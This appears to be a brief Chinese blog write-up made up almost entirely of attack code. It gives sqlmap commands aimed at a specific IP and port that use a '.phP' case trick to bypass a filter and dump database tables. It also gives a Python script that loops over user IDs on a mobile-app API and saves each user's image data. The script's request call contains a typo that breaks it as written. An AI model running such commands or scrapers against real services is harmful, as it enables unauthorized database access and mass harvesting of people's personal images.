web

发表于 | 分类于 | 作者:ESE

web不知所云

sqlmap

直接shell,因为windows不区分大小写,而PHP区分,从而绕过,进行注入。

1
2
3
4
5
6
7
8
跑数据库
sqlmap -u "http://101.71.29.5:10006/json.phP?id=admin" --dbs -p id --thread 10 
测试数据库
sqlmap -u "http://101.71.29.5:10006/json.phP?id=admin" --flush -p id --thread 10 --current-db
查表
sqlmap -u "http://101.71.29.5:10006/json.phP?id=admin" --flush -p id --thread 10 --current-db -D  5monthweb --tables
进入表
sqlmap -u "http://101.71.29.5:10006/json.phP?id=admin" --flush -p id --thread 10 --current-db -D  5monthweb -T article --dump

web的url

python3.7环境下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# -*- coding: utf8 -*-
import base64
from urllib import request
import json
def save(strs,uid):
	imgdata=base64.b64decode(strs)  
	name = str(uid)+".jpg"
	file=open(name,'wb')
	file.write(imgdata)  
	file.close()
def dowmloadPicture():
	url = r"https://"
	headers = { 
				"Connection":"Keep-Alive",
				"Accept-Encoding":"gzip",
				"User-Agent":"okhttp/3.2.0"
			  }
	for id in range(717630,717640):
		try:
			payload = "funcNo=2000003&userid="+str(id)+"&op_way=3&op_source=3&infocolect_channel=3"
			payload = payload.encode(encoding='UTF8')
			r = request.Request(url=url,data=payload,headers=headers,methmod="POST")
			res = request.urlopen(r)
			jsonData = json.loads(res.read())
			result = jsonData["results"]
			imgdata = result[0]["img_data"]
			save(imgdata,id)
			imgdata1 = result[1]["img_data"]
			save(imgdata1,str(id)+"_")
			print("0k")
		except:
			print("No")
			pass
if __name__ == "__main__":
    dowmloadPicture()

Donate
-------------本文结束感谢您的阅读-------------